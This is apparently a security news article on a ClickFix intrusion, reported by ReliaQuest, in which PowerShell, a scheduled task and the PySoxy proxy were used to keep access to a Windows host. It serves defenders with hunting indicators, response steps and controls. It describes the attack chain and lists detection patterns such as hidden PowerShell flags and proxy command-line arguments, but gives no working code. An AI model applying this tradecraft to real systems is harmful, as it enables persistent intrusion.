ClickFix Attacks Add PySoxy Proxy to Maintain Access After Initial Compromise

A ClickFix attack chain observed by ReliaQuest shows how the social engineering technique is evolving from a one-time user mistake into a more durable intrusion method. In this case, attackers combined malicious PowerShell execution with PySoxy, an open-source Python SOCKS5 proxy tool, to create a second route back into a compromised Windows host.

The attack began with a familiar ClickFix lure. A compromised website displayed a fake prompt that convinced the user to paste and run a PowerShell command. After that command executed, the attackers created persistence, performed reconnaissance, opened a PowerShell-based command-and-control channel, and later deployed PySoxy as a backup access path.

The key lesson for defenders is clear: blocking one callback does not always end a ClickFix incident. If a scheduled task, staged script, Python runtime, or proxy component remains on the endpoint, the attack can keep trying to reconnect long after network security tools block the first connection.

What makes this ClickFix campaign different

ClickFix attacks usually rely on social engineering rather than a traditional software exploit. The victim sees a fake browser, CAPTCHA, update, or troubleshooting prompt and follows instructions that run a command on the local machine.

That first step already gives attackers code execution. What makes the ReliaQuest case more serious is the follow-up activity. The attackers did not rely on a single PowerShell callback. They built a layered access chain with persistence and a second proxy-based route.

ReliaQuest said this was the first time it had seen ClickFix combined with PySoxy in an active intrusion. The campaign shows how attackers can turn a simple copy-and-paste lure into a post-exploitation workflow that looks closer to pre-ransomware access.

Attack stage	Observed behavior
Initial lure	A compromised website tricked the user into running a PowerShell command.
Execution	The command launched from explorer.exe and started a multi-stage PowerShell chain.
Persistence	A scheduled task relaunched a staged script from C:\ProgramData about every 40 minutes.
First access path	A PowerShell-based remote access script polled attacker infrastructure for commands.
Reconnaissance	Attackers checked domain status, group memberships, domain controllers, and nearby systems.
Second access path	PySoxy was executed through Python bytecode to create a proxy-based connection.

How PySoxy fits into the attack

PySoxy is not new malware. It is a small open-source SOCKS5 proxy server written in Python. That makes this attack more difficult for defenders because the tool itself has legitimate or educational uses.

In the observed incident, attackers downloaded Python tooling into C:\ProgramData and executed a compiled Python bytecode file. The command line included proxy-style arguments such as -ssl, -remote_ip, and -remote_port.

This turned the compromised endpoint into a second communication path. Even if defenders blocked the PowerShell C2 channel, the PySoxy route could continue providing proxy access unless responders removed the local persistence and staged components.

Why scheduled tasks made the attack harder to contain

The scheduled task changed the incident from a short-lived execution event into a repeating compromise attempt. ReliaQuest observed that the task kept relaunching the malicious activity after defenders blocked outbound connections.

This matters because many teams treat a blocked callback as containment. In this case, the host still had local instructions to restart the chain. The attacker did not need the first connection to stay alive forever.

For incident responders, that means the endpoint must be isolated and inspected. Analysts should not only block infrastructure. They should remove scheduled tasks, staged scripts, Python files, bytecode, and any other component that can relaunch the activity.

• Blocking C2 traffic may stop communication temporarily.
• Local persistence can restart the attack chain later.
• PySoxy can create a separate proxy channel with different traffic patterns.
• Python bytecode in ProgramData should raise suspicion during a ClickFix investigation.
• Containment should include endpoint cleanup, not only network blocking.

ClickFix is moving deeper into post-exploitation

ClickFix started as a social engineering technique that relied on user action. Attackers used fake prompts to convince people to run malicious commands in PowerShell, Windows Run, Terminal, or similar tools.

Microsoft has warned that ClickFix can bypass some conventional defenses because the user launches the command manually. Microsoft has also observed ClickFix campaigns delivering infostealers, remote access tools, loaders, rootkits, and other malware families.

The PySoxy case shows another direction. Instead of only delivering a known malware payload, attackers used built-in Windows behavior, scripts, scheduled tasks, and an older open-source proxy to build access that blends into administrative activity.

Why this matters for ransomware defense

ClickFix can give attackers an easy starting point. A user runs the command, and the attacker quickly receives code execution on a corporate endpoint. From there, the next steps often involve reconnaissance, credential access, lateral movement, and data staging.

The ReliaQuest case included domain reconnaissance and SMB activity against discovered systems. That behavior fits the early stages of hands-on-keyboard intrusion activity, where attackers try to understand the environment before moving deeper.

Ransomware affiliates often value access methods that survive early containment. A ClickFix chain with scheduled tasks and a proxy backup can give them more time to investigate the network and prepare follow-up activity.

Defender concern	Why it matters
User-launched command	Security tools may see execution as user initiated rather than exploit driven.
PowerShell abuse	Attackers can run commands, fetch payloads, and avoid dropping obvious executables.
Scheduled task persistence	The attack can restart after processes stop or connections fail.
Proxy tooling	A second channel can help attackers maintain access through different infrastructure.
Reconnaissance	Domain and SMB discovery can precede lateral movement and ransomware staging.

What SOC teams should hunt for

Security teams should hunt for sequences, not isolated events. A single PowerShell command may not tell the whole story. The stronger signal comes when PowerShell execution is followed by writes to C:\ProgramData, scheduled task creation, curl downloads, Python execution, and outbound proxy-style connections.

Analysts should also review PowerShell processes launched with arguments such as NoProfile, ExecutionPolicy Bypass, and WindowStyle Hidden. These options often appear in low-visibility execution chains.

For PySoxy-related activity, defenders should search for python.exe running compiled .pyc files with proxy arguments. Command-line terms such as -ssl, -remote_ip, -remote_port, SOCKS, and .pyc can help identify suspicious execution.

• PowerShell launched after a browser or explorer.exe event.
• Scheduled tasks created shortly after suspicious PowerShell activity.
• Scripts staged in C:\ProgramData or other non-standard directories.
• curl downloads to attacker-controlled infrastructure.
• python.exe executing .pyc files.
• Command-line arguments tied to proxy behavior.
• LDAP, SMB, and domain controller discovery after the initial ClickFix event.

Recommended response steps

Incident responders should treat this kind of ClickFix activity as a potential full compromise, not as a simple user error. The affected machine should be isolated before analysts begin cleanup.

Next, teams should review scheduled tasks, staged scripts, Python files, and related process history. They should remove all persistence mechanisms and confirm that no proxy process remains active.

Network blocks still matter, but they should come with host-level cleanup. Otherwise, a scheduled task may continue trying to relaunch the script, and a second access route may remain available.

1. Isolate the affected endpoint from the network.
2. Review recent PowerShell execution history.
3. Check scheduled tasks created after the suspected ClickFix event.
4. Inspect C:\ProgramData for staged scripts, Python files, and .pyc files.
5. Search for python.exe command lines using -ssl, -remote_ip, or -remote_port.
6. Block known attacker infrastructure across DNS, proxy, firewall, and EDR controls.
7. Review domain reconnaissance, SMB access, and lateral movement attempts.
8. Reset credentials if the endpoint handled privileged sessions or sensitive access.
9. Reimage the host if persistence or attacker activity cannot be fully removed.

How organizations can reduce ClickFix risk

User awareness remains important, but it cannot be the only control. Employees should know that legitimate websites should not ask them to paste commands into PowerShell, Windows Run, Terminal, or Command Prompt.

Administrators should also restrict scripting where possible. Controls such as PowerShell logging, Constrained Language Mode, attack surface reduction rules, application allowlisting, and endpoint detection can reduce the chance that a copied command becomes a full intrusion.

Organizations should also baseline approved remote access, proxy, and scripting tools. Attackers increasingly abuse legitimate or open-source tools because they can look less suspicious than traditional malware.

Control	Purpose
User training	Warn users never to run commands copied from web prompts.
PowerShell logging	Capture command lines, script blocks, and suspicious execution patterns.
Application allowlisting	Limit unauthorized Python, proxy, and scripting tools.
Scheduled task monitoring	Detect new persistence created after suspicious execution.
Egress controls	Restrict outbound traffic to unknown servers and unusual ports.
Endpoint isolation playbooks	Contain hosts quickly when ClickFix moves into post-exploitation.

Bottom line

The ClickFix and PySoxy combination shows how attackers can use simple social engineering to start a more resilient intrusion. A user runs one command, but the attacker builds persistence, reconnaissance, and redundant access behind it.

For defenders, the response must move beyond blocking a bad IP address. SOC teams need to inspect the host, remove scheduled tasks, delete staged payloads, review Python execution, and confirm that no second communication path remains.

ClickFix incidents now deserve the same urgency as other initial access events. When attackers add persistence and proxy access, a single pasted command can become the start of a broader compromise.

FAQ